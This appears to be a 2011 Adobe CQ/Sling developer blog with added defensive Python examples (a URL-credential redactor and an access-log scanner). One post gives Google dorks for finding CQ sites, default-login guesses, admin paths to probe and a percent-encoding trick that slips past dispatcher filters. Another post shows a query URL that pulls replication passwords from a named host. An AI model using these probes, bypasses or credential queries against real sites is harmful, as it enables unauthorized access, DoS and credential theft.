so, you want to use vlt
read -p "password: " -s p
vlt -q rcp -q -b 1000 -t 1 -u "http://user:$p@foo/crx/-/jcr:root/content" "http://user:$p@bar/crx/-/jcr:root/content"
and it prints stuff like
Connecting via JCR remoting to http://user:r34lp455w0rd!!@localhost:4502/crx/server
I could not find a way to disable that. so,
vlt -q rcp -q -b 1000 -t 1 -u "http://user:$p@foo/crx/-/jcr:root/content" "http://user:$p@bar/crx/-/jcr:root/content" | grep -v "http://" >> your.log
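An added example, not part of the original post: instead of dropping every line that contains a URL, a small Python filter can blank out only the user:password part, so the rest of the vlt output (progress, errors, node counts) still lands in the log. The file name redact_urls.py and the sample line in the docstring are assumptions for this example.

```python
"""Redact user:password@ credentials embedded in URLs before output reaches a log.

Usage (assumed file name):  vlt ... 2>&1 | python3 redact_urls.py >> your.log
"""
import re
import sys

# Matches  scheme://user:password@  and captures the pieces so only the
# password (and optionally the user) is replaced. The password class is
# greedy and excludes '/' and whitespace, so a password that itself contains
# '@' is still consumed up to the last '@' before the host.
CRED_RE = re.compile(
    r'(?P<scheme>[A-Za-z][A-Za-z0-9+.-]*://)'
    r'(?P<user>[^/\s:@]+):(?P<pw>[^/\s]+)@'
)


def redact_credentials(text, keep_user=True):
    """Return text with every URL password replaced by '***'.

    With keep_user=False the user name is masked as well. URLs without a
    userinfo part (http://host:4502/path) are left untouched, because the
    pattern requires a trailing '@' after the user:password pair.
    """
    def repl(m):
        user = m['user'] if keep_user else '***'
        return f"{m['scheme']}{user}:***@"

    return CRED_RE.sub(repl, text)


def main():
    # Stream stdin to stdout line by line so it works in a pipeline.
    for line in sys.stdin:
        sys.stdout.write(redact_credentials(line))


if __name__ == '__main__':
    main()
```

If the "Connecting via JCR remoting" line goes to stderr rather than stdout, merge the streams with 2>&1 before the pipe, as in the usage line above; otherwise the unredacted URL bypasses the filter and ends up on the terminal or in whatever captures stderr.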
Saturday, September 24, 2011
Saturday, September 17, 2011
CQ related google queries
This query returns many CQ sites:
http://www.google.com/search?q=inurl:/content/geometrixx
Many of the sites accept .json rendering (-1.json, 34324232.json, etc.). Some also accept .query.json?statement=//*
Easy for content grabbing and DOS attack.
Also, this:
http://www.google.com/search?q=inurl:/content/dam
Usually, /content/dam.xml is large. Easy for DOS attack.
And,
http://www.google.com/search?q=%22/etc/designs/*.css%22
Many sites block .json on /content. But they still allow .json on /etc.
These queries show a few author instances (try default CQ logins other than admin:admin, such as author:author):
http://www.google.com/search?q=%22cq5%20login%22
http://www.google.com/search?q=inurl:%22/etc/replication%22
Once you locate a CQ site, you can try various paths:
/system/console
/admin
/etc/replication
/crx
/crxde
/bin/crxde/logs
/libs/cq/core/content/login.html
/libs/crxde/resources/welcome.html
Also, try json servlets:
http://www.adobe.com/etc/pagetables/feed_proxies.tidy.-2345.json?asdf
format is:
/some/resource.<depth>.json
If things are blocked, try again with some of the characters replaced by URL encoding.
For example, this is 404:
https://author.day.com/libs/cq/core/content/login.query.json?statement=//element%28*,cq:Page%29
But this returns:
https://author.day.com/libs/cq/core/content/login.qu%65ry.js%6Fn?statement=//element(*,cq:Page)
The e in query is replaced with %65 and the o in json with %6F.
Most of these are possible because of Sling: http://sling.apache.org/
Usually, databases use a different port (and a protocol other than HTTP) to communicate with HTTP applications. Even databases that speak HTTP (such as CouchDB, http://couchdb.apache.org/) can be configured to use a different port from the HTML rendering server. But Sling exposes the entire database (JCR) content on the same port for HTTP clients to access.
Sling does have an access control mechanism. But the common development paradigm for Sling is to expose all resources to everyone.
You could instead expose only a few resources and have their resourceType query/access the actual content resources.
For example, instead of exposing the following:
/content/a.html
/content/b.html
/content/c.html
....
You can expose only one resource:
/content/pages
And have the resourceType of /content/pages handle GET requests to:
/content/pages.a.html
/content/pages.b.html
/content/pages.c.html
...
by reading actual content from:
/hidden/a
/hidden/b
/hidden/c
...
Or, you can have a proxy server block the various paths that could be used maliciously. For example, CQ has a dispatcher module for Apache httpd, and you can configure dispatcher.any to deny access to various globs.
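An added example, not part of the original post: whether the blocking is done by a dispatcher glob or by a servlet in front of the content, the %65/%6F case above shows that a filter which matches the raw request path can be walked around. The Python checker below does what such a filter has to do, percent-decoding the path (repeatedly, so double encoding is undone too) before looking for depth selectors, .infinity.json, the .query.json servlet, .xml dumps under /content and the administrative paths listed in this post, and it marks requests whose raw path differed from the decoded one. The Apache-style log lines are constructed for the example and the label names are mine.

```python
"""Flag Sling/CQ tree-dump, query-servlet and admin-console requests in an access log.

The request path is percent-decoded before matching, so selector letters hidden
as %65 or %6F are seen for what they are.
"""
import re
from urllib.parse import unquote, urlsplit

# Constructed sample in Apache common log format (not from any real server).
SAMPLE_LOG = """\
10.0.0.5 - - [17/Sep/2011:10:01:02 +0000] "GET /content/geometrixx/en.html HTTP/1.1" 200 5120
10.0.0.7 - - [17/Sep/2011:10:01:05 +0000] "GET /content/geometrixx.-1.json HTTP/1.1" 200 88213
10.0.0.7 - - [17/Sep/2011:10:01:09 +0000] "GET /content/dam.xml HTTP/1.1" 200 9231122
10.0.0.9 - - [17/Sep/2011:10:02:11 +0000] "GET /libs/cq/core/content/login.query.json?statement=//* HTTP/1.1" 404 312
10.0.0.9 - - [17/Sep/2011:10:02:14 +0000] "GET /libs/cq/core/content/login.qu%65ry.js%6Fn?statement=//element(*,cq:Page) HTTP/1.1" 200 40112
10.0.0.11 - - [17/Sep/2011:10:03:00 +0000] "GET /etc/designs/geometrixx.infinity.json HTTP/1.1" 200 77001
10.0.0.12 - - [17/Sep/2011:10:03:30 +0000] "GET /system/console/bundles HTTP/1.1" 401 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Administrative paths mentioned in the post; any hit is worth a look.
ADMIN_PREFIXES = ('/system/console', '/admin', '/etc/replication', '/crx',
                  '/crxde', '/bin/crxde', '/libs/crxde')


def normalize(target):
    """Strip the query string and percent-decode the path until it stops changing."""
    path = urlsplit(target).path
    prev = None
    while path != prev:
        prev, path = path, unquote(path)
    return path.lower()


def classify(path):
    """Label a decoded request path, or return None when it looks like a plain page."""
    last_segment = path.rsplit('/', 1)[-1]
    parts = last_segment.split('.')
    if len(parts) >= 2:
        selectors, ext = parts[1:-1], parts[-1]
        if ext == 'json' and 'query' in selectors:
            return 'query-servlet'          # login.query.json?statement=...
        if ext == 'json' and any(s == 'infinity' or re.fullmatch(r'-?\d+', s)
                                 for s in selectors):
            return 'tree-dump'              # node.-1.json, node.infinity.json
        if ext == 'xml' and path.startswith('/content/'):
            return 'tree-dump'              # /content/dam.xml style full dumps
    if path.startswith(ADMIN_PREFIXES):
        return 'admin-path'
    return None


def scan_log(text):
    """Return one finding dict per flagged request, in log order."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        raw_path = urlsplit(m['target']).path
        path = normalize(m['target'])
        label = classify(path)
        if label is None:
            continue
        findings.append({
            'ip': m['ip'], 'ts': m['ts'], 'status': int(m['status']),
            'label': label, 'path': path,
            # True when decoding changed the path: selector letters were encoded.
            'encoded': raw_path.lower() != path,
        })
    return findings


def main(text=SAMPLE_LOG):
    for f in scan_log(text):
        note = ' (percent-encoded selectors)' if f['encoded'] else ''
        print(f"{f['ip']:10} {f['status']} {f['label']:13} {f['path']}{note}")


if __name__ == '__main__':
    main()
```

Requests for a single node (/content/foo.json) are deliberately not flagged; the point is the subtree and query renderings, plus the two-line pattern where the plain form gets a 404 and the encoded form of the same path gets a 200, which is exactly the filter gap described above.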
Thursday, September 15, 2011
ADEP WEM with AWS EC2
Apparently, Adobe ADEP WEM product will be Amazon EC2 optimized.
http://adobecemcloud.com/download/
And, free CQ license:
http://adobecemcloud.com/download/licence.properties
flexibility of Sling
Sling lets you query content:
https://author.day.com/libs/cq/core/content/login.query.json?statement=//*[@transportPassword]/%28@transportPassword%20|%20@transportUri%20|%20@transportUser%29
Wednesday, September 14, 2011
datastore garbage collection
My instance had a 12GB datastore:
$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda5 169G 73G 88G 46% /
none 5.9G 672K 5.9G 1% /dev
none 5.9G 196K 5.9G 1% /dev/shm
none 5.9G 104K 5.9G 1% /var/run
none 5.9G 0 5.9G 0% /var/lock
/dev/sda2 98G 12G 81G 13% /mnt/datastore
I ran datastore garbage collection, which took 5 hours, and it's now 2GB:
$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda5 169G 73G 88G 46% /
none 5.9G 672K 5.9G 1% /dev
none 5.9G 296K 5.9G 1% /dev/shm
none 5.9G 108K 5.9G 1% /var/run
none 5.9G 0 5.9G 0% /var/lock
/dev/sda2 98G 2.0G 91G 3% /mnt/datastore
I keep the datastore outside crx-quickstart on a different drive, for easy backup etc.:
<DataStore class="com.day.crx.core.data.ClusterDataStore">
<param name="path" value="/mnt/datastore"/>
</DataStore>
The script for running datastore garbage collection is here:
/crx/login.jsp
There are curl command examples here:
http://dev.day.com/docs/en/crx/current/administering/backup_and_restore.html#Automating%20Backup%20Creation?
For example,
curl -c login.txt "http://localhost:7402/crx/login.jsp?UserId=admin&Password=xyz&Workspace=crx.default"
Of course they don't work.
You need this instead:
curl -c login.txt -F"_charset_=UTF-8" -F"UserId=admin" -F"Password=admin" -F"Workspace=crx.default" "http://localhost:7402/crx/login.jsp"
You need a POST request, and you also need to include the _charset_ param.